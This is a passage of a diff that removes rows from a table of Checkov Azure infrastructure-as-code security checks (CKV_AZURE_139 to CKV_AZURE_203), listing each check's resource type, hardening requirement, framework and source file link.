-| 1869 | CKV_AZURE_139            | resource                         | azurerm_container_registry                                                                       | Ensure ACR set to disable public networking                                                                                                                                                              | Terraform               | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRPublicNetworkAccessDisabled.py)                                                         |
-| 1870 | CKV_AZURE_140            | resource                         | azurerm_cosmosdb_account                                                                         | Ensure that Local Authentication is disabled on CosmosDB                                                                                                                                                 | Terraform               | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBLocalAuthDisabled.py)                                                                   |
-| 1871 | CKV_AZURE_141            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS local admin account is disabled                                                                                                                                                               | Terraform               | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSLocalAdminDisabled.py)                                                                           |
-| 1872 | CKV_AZURE_142            | resource                         | azurerm_machine_learning_compute_cluster                                                         | Ensure Machine Learning Compute Cluster Local Authentication is disabled                                                                                                                                 | Terraform               | [MLCCLADisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLCCLADisabled.py)                                                                                         |
-| 1873 | CKV_AZURE_143            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster nodes do not have public IP addresses                                                                                                                                                 | Terraform               | [AKSNodePublicIpDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSNodePublicIpDisabled.py)                                                                       |
-| 1874 | CKV_AZURE_144            | resource                         | azurerm_machine_learning_workspace                                                               | Ensure that Public Access is disabled for Machine Learning Workspace                                                                                                                                     | Terraform               | [MLPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLPublicAccess.py)                                                                                         |
-| 1875 | CKV_AZURE_145            | resource                         | azurerm_function_app                                                                             | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1876 | CKV_AZURE_145            | resource                         | azurerm_function_app_slot                                                                        | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1877 | CKV_AZURE_145            | resource                         | azurerm_linux_function_app                                                                       | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1878 | CKV_AZURE_145            | resource                         | azurerm_linux_function_app_slot                                                                  | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1879 | CKV_AZURE_145            | resource                         | azurerm_windows_function_app                                                                     | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1880 | CKV_AZURE_145            | resource                         | azurerm_windows_function_app_slot                                                                | Ensure Function app is using the latest version of TLS encryption                                                                                                                                        | Terraform               | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppMinTLSVersion.py)                                                                     |
-| 1881 | CKV_AZURE_146            | resource                         | azurerm_postgresql_configuration                                                                 | Ensure server parameter 'log_retention' is set to 'ON' for PostgreSQL Database Server                                                                                                                    | Terraform               | [PostgreSQLServerLogRetentionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerLogRetentionEnabled.py)                                               |
-| 1882 | CKV_AZURE_147            | resource                         | azurerm_postgresql_server                                                                        | Ensure PostgreSQL is using the latest version of TLS encryption                                                                                                                                          | Terraform               | [PostgreSQLMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLMinTLSVersion.py)                                                                       |
-| 1883 | CKV_AZURE_148            | resource                         | azurerm_redis_cache                                                                              | Ensure Redis Cache is using the latest version of TLS encryption                                                                                                                                         | Terraform               | [RedisCacheMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheMinTLSVersion.py)                                                                       |
-| 1884 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | arm                     | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                   |
-| 1885 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachineScaleSets                                                        | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Bicep                   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                   |
-| 1886 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | arm                     | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                   |
-| 1887 | CKV_AZURE_149            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Bicep                   | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py)                                                                   |
-| 1888 | CKV_AZURE_149            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform               | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                       |
-| 1889 | CKV_AZURE_149            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure that Virtual machine does not enable password authentication                                                                                                                                      | Terraform               | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMDisablePasswordAuthentication.py)                                                       |
-| 1890 | CKV_AZURE_150            | resource                         | azurerm_machine_learning_compute_cluster                                                         | Ensure Machine Learning Compute Cluster Minimum Nodes Set To 0                                                                                                                                           | Terraform               | [MLComputeClusterMinNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MLComputeClusterMinNodes.py)                                                                     |
-| 1891 | CKV_AZURE_151            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables encryption                                                                                                                                                                     | arm                     | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                                       |
-| 1892 | CKV_AZURE_151            | resource                         | Microsoft.Compute/virtualMachines                                                                | Ensure Windows VM enables encryption                                                                                                                                                                     | Bicep                   | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py)                                                                                       |
-| 1893 | CKV_AZURE_151            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Windows VM enables encryption                                                                                                                                                                     | Terraform               | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMEncryptionAtHost.py)                                                                           |
-| 1894 | CKV_AZURE_152            | resource                         | azurerm_api_management                                                                           | Ensure Client Certificates are enforced for API management                                                                                                                                               | Terraform               | [APIManagementCertsEnforced.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementCertsEnforced.py)                                                                 |
-| 1895 | CKV_AZURE_153            | resource                         | azurerm_app_service_slot                                                                         | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1896 | CKV_AZURE_153            | resource                         | azurerm_linux_web_app_slot                                                                       | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1897 | CKV_AZURE_153            | resource                         | azurerm_windows_web_app_slot                                                                     | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot                                                                                                                             | Terraform               | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotHTTPSOnly.py)                                                                       |
-| 1898 | CKV_AZURE_154            | resource                         | azurerm_app_service_slot                                                                         | Ensure the App service slot is using the latest version of TLS encryption                                                                                                                                | Terraform               | [AppServiceSlotMinTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotMinTLS.py)                                                                             |
-| 1899 | CKV_AZURE_155            | resource                         | azurerm_app_service_slot                                                                         | Ensure debugging is disabled for the App service slot                                                                                                                                                    | Terraform               | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSlotDebugDisabled.py)                                                               |
-| 1900 | CKV_AZURE_156            | resource                         | azurerm_mssql_database_extended_auditing_policy                                                  | Ensure default Auditing policy for a SQL Server is configured to capture and retain the activity logs                                                                                                    | Terraform               | [MSSQLServerAuditPolicyLogMonitor.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MSSQLServerAuditPolicyLogMonitor.py)                                                     |
-| 1901 | CKV_AZURE_157            | resource                         | azurerm_synapse_workspace                                                                        | Ensure that Synapse workspace has data_exfiltration_protection_enabled                                                                                                                                   | Terraform               | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesDataExfilProtection.py)                                 |
-| 1902 | CKV_AZURE_158            | resource                         | azurerm_databricks_workspace                                                                     | Ensure that databricks workspace is not public                                                                                                                                                           | Terraform               | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DatabricksWorkspaceIsNotPublic.py)                                                         |
-| 1903 | CKV_AZURE_159            | resource                         | azurerm_function_app                                                                             | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform               | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                     |
-| 1904 | CKV_AZURE_159            | resource                         | azurerm_function_app_slot                                                                        | Ensure function app builtin logging is enabled                                                                                                                                                           | Terraform               | [FunctionAppEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppEnableLogging.py)                                                                     |
-| 1905 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | arm                     | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                           |
-| 1906 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups                                                          | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Bicep                   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                           |
-| 1907 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | arm                     | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                           |
-| 1908 | CKV_AZURE_160            | resource                         | Microsoft.Network/networkSecurityGroups/securityRules                                            | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Bicep                   | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py)                                                                           |
-| 1909 | CKV_AZURE_160            | resource                         | azurerm_network_security_group                                                                   | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform               | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                               |
-| 1910 | CKV_AZURE_160            | resource                         | azurerm_network_security_rule                                                                    | Ensure that HTTP (port 80) access is restricted from the internet                                                                                                                                        | Terraform               | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleHTTPAccessRestricted.py)                                                               |
-| 1911 | CKV_AZURE_161            | resource                         | azurerm_spring_cloud_api_portal                                                                  | Ensures Spring Cloud API Portal is enabled on for HTTPS                                                                                                                                                  | Terraform               | [SpringCloudAPIPortalHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalHTTPSOnly.py)                                                           |
-| 1912 | CKV_AZURE_162            | resource                         | azurerm_spring_cloud_api_portal                                                                  | Ensures Spring Cloud API Portal Public Access Is Disabled                                                                                                                                                | Terraform               | [SpringCloudAPIPortalPublicAccessIsDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SpringCloudAPIPortalPublicAccessIsDisabled.py)                                 |
-| 1913 | CKV_AZURE_163            | resource                         | azurerm_container_registry                                                                       | Enable vulnerability scanning for container images.                                                                                                                                                      | Terraform               | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRContainerScanEnabled.py)                                                                       |
-| 1914 | CKV_AZURE_164            | resource                         | azurerm_container_registry                                                                       | Ensures that ACR uses signed/trusted images                                                                                                                                                              | Terraform               | [ACRUseSignedImages.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRUseSignedImages.py)                                                                                 |
-| 1915 | CKV_AZURE_165            | resource                         | azurerm_container_registry                                                                       | Ensure geo-replicated container registries to match multi-region container deployments.                                                                                                                  | Terraform               | [ACRGeoreplicated.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRGeoreplicated.py)                                                                                     |
-| 1916 | CKV_AZURE_166            | resource                         | azurerm_container_registry                                                                       | Ensure container image quarantine, scan, and mark images verified                                                                                                                                        | Terraform               | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableImageQuarantine.py)                                                                     |
-| 1917 | CKV_AZURE_167            | resource                         | azurerm_container_registry                                                                       | Ensure a retention policy is set to cleanup untagged manifests.                                                                                                                                          | Terraform               | [ACREnableRetentionPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableRetentionPolicy.py)                                                                     |
-| 1918 | CKV_AZURE_168            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform               | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                   |
-| 1919 | CKV_AZURE_168            | resource                         | azurerm_kubernetes_cluster_node_pool                                                             | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods.                                                                                                                      | Terraform               | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py)                                                                                   |
-| 1920 | CKV_AZURE_169            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets                                                                                                                                               | Terraform               | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py)                                                                           |
-| 1921 | CKV_AZURE_170            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure that AKS use the Paid Sku for its SLA                                                                                                                                                             | Terraform               | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py)                                                                                             |
-| 1922 | CKV_AZURE_171            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure AKS cluster upgrade channel is chosen                                                                                                                                                             | Terraform               | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py)                                                                                   |
-| 1923 | CKV_AZURE_172            | resource                         | azurerm_kubernetes_cluster                                                                       | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters                                                                                                                                 | Terraform               | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py)                                                                         |
-| 1924 | CKV_AZURE_173            | resource                         | azurerm_api_management                                                                           | Ensure API management uses at least TLS 1.2                                                                                                                                                              | Terraform               | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py)                                                                           |
-| 1925 | CKV_AZURE_174            | resource                         | azurerm_api_management                                                                           | Ensure API management public access is disabled                                                                                                                                                          | Terraform               | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py)                                                                   |
-| 1926 | CKV_AZURE_175            | resource                         | azurerm_web_pubsub                                                                               | Ensure Web PubSub uses a SKU with an SLA                                                                                                                                                                 | Terraform               | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py)                                                                                             |
-| 1927 | CKV_AZURE_176            | resource                         | azurerm_web_pubsub                                                                               | Ensure Web PubSub uses managed identities to access Azure resources                                                                                                                                      | Terraform               | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py)                                                                           |
-| 1928 | CKV_AZURE_177            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform               | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                           |
-| 1929 | CKV_AZURE_177            | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure Windows VM enables automatic updates                                                                                                                                                              | Terraform               | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py)                                                                           |
-| 1930 | CKV_AZURE_178            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform               | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                         |
-| 1931 | CKV_AZURE_178            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure linux VM enables SSH with keys for secure communication                                                                                                                                           | Terraform               | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py)                                                                                         |
-| 1932 | CKV_AZURE_179            | resource                         | azurerm_linux_virtual_machine                                                                    | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1933 | CKV_AZURE_179            | resource                         | azurerm_linux_virtual_machine_scale_set                                                          | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1934 | CKV_AZURE_179            | resource                         | azurerm_windows_virtual_machine                                                                  | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1935 | CKV_AZURE_179            | resource                         | azurerm_windows_virtual_machine_scale_set                                                        | Ensure VM agent is installed                                                                                                                                                                             | Terraform               | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py)                                                                                 |
-| 1936 | CKV_AZURE_180            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that data explorer uses Sku with an SLA                                                                                                                                                           | Terraform               | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py)                                                                           |
-| 1937 | CKV_AZURE_181            | resource                         | azurerm_kusto_cluster                                                                            | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely.                                                                                                              | Terraform               | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py)                                                               |
-| 1938 | CKV_AZURE_182            | resource                         | azurerm_virtual_network                                                                          | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform               | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                               |
-| 1939 | CKV_AZURE_182            | resource                         | azurerm_virtual_network_dns_servers                                                              | Ensure that VNET has at least 2 connected DNS Endpoints                                                                                                                                                  | Terraform               | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py)                                                                               |
-| 1940 | CKV_AZURE_183            | resource                         | azurerm_virtual_network                                                                          | Ensure that VNET uses local DNS addresses                                                                                                                                                                | Terraform               | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py)                                                                                             |
-| 1941 | CKV_AZURE_184            | resource                         | azurerm_app_configuration                                                                        | Ensure 'local_auth_enabled' is set to 'False'                                                                                                                                                            | Terraform               | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py)                                                                                 |
-| 1942 | CKV_AZURE_185            | resource                         | azurerm_app_configuration                                                                        | Ensure 'Public Access' is not Enabled for App configuration                                                                                                                                              | Terraform               | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py)                                                                           |
-| 1943 | CKV_AZURE_186            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration encryption block is set.                                                                                                                                                        | Terraform               | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py)                                                                               |
-| 1944 | CKV_AZURE_187            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration purge protection is enabled                                                                                                                                                     | Terraform               | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py)                                                                     |
-| 1945 | CKV_AZURE_188            | resource                         | azurerm_app_configuration                                                                        | Ensure App configuration Sku is standard                                                                                                                                                                 | Terraform               | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py)                                                                                             |
-| 1946 | CKV_AZURE_189            | resource                         | azurerm_key_vault                                                                                | Ensure that Azure Key Vault disables public network access                                                                                                                                               | Terraform               | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py)                                               |
-| 1947 | CKV_AZURE_190            | resource                         | azurerm_storage_account                                                                          | Ensure that Storage blobs restrict public access                                                                                                                                                         | Terraform               | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py)                                                       |
-| 1948 | CKV_AZURE_191            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure that Managed identity provider is enabled for Azure Event Grid Topic                                                                                                                              | Terraform               | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py)                                           |
-| 1949 | CKV_AZURE_192            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure that Azure Event Grid Topic local Authentication is disabled                                                                                                                                      | Terraform               | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py)                                                   |
-| 1950 | CKV_AZURE_193            | resource                         | azurerm_eventgrid_topic                                                                          | Ensure public network access is disabled for Azure Event Grid Topic                                                                                                                                      | Terraform               | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py)                                                               |
-| 1951 | CKV_AZURE_194            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Managed identity provider is enabled for Azure Event Grid Domain                                                                                                                             | Terraform               | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py)                                         |
-| 1952 | CKV_AZURE_195            | resource                         | azurerm_eventgrid_domain                                                                         | Ensure that Azure Event Grid Domain local Authentication is disabled                                                                                                                                     | Terraform               | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py)                                                 |
-| 1953 | CKV_AZURE_196            | resource                         | azurerm_signalr_service                                                                          | Ensure that SignalR uses a Paid Sku for its SLA                                                                                                                                                          | Terraform               | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py)                                                                                           |
-| 1954 | CKV_AZURE_197            | resource                         | azurerm_cdn_endpoint                                                                             | Ensure the Azure CDN disables the HTTP endpoint                                                                                                                                                          | Terraform               | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py)                                                                       |
-| 1955 | CKV_AZURE_198            | resource                         | azurerm_cdn_endpoint                                                                             | Ensure the Azure CDN enables the HTTPS endpoint                                                                                                                                                          | Terraform               | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py)                                                                       |
-| 1956 | CKV_AZURE_199            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Azure Service Bus uses double encryption                                                                                                                                                     | Terraform               | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py)                                         |
-| 1957 | CKV_AZURE_200            | resource                         | azurerm_cdn_endpoint_custom_domain                                                               | Ensure the Azure CDN endpoint is using the latest version of TLS encryption                                                                                                                              | Terraform               | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py)                                                                                     |
-| 1958 | CKV_AZURE_201            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Azure Service Bus uses a customer-managed key to encrypt data                                                                                                                                | Terraform               | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py)                                                                           |
-| 1959 | CKV_AZURE_202            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure that Managed identity provider is enabled for Azure Service Bus                                                                                                                                   | Terraform               | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py)                                         |
-| 1960 | CKV_AZURE_203            | resource                         | azurerm_servicebus_namespace                                                                     | Ensure Azure Service Bus Local Authentication is disabled                                                                                                                                                | Terraform               | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py)                                                     |
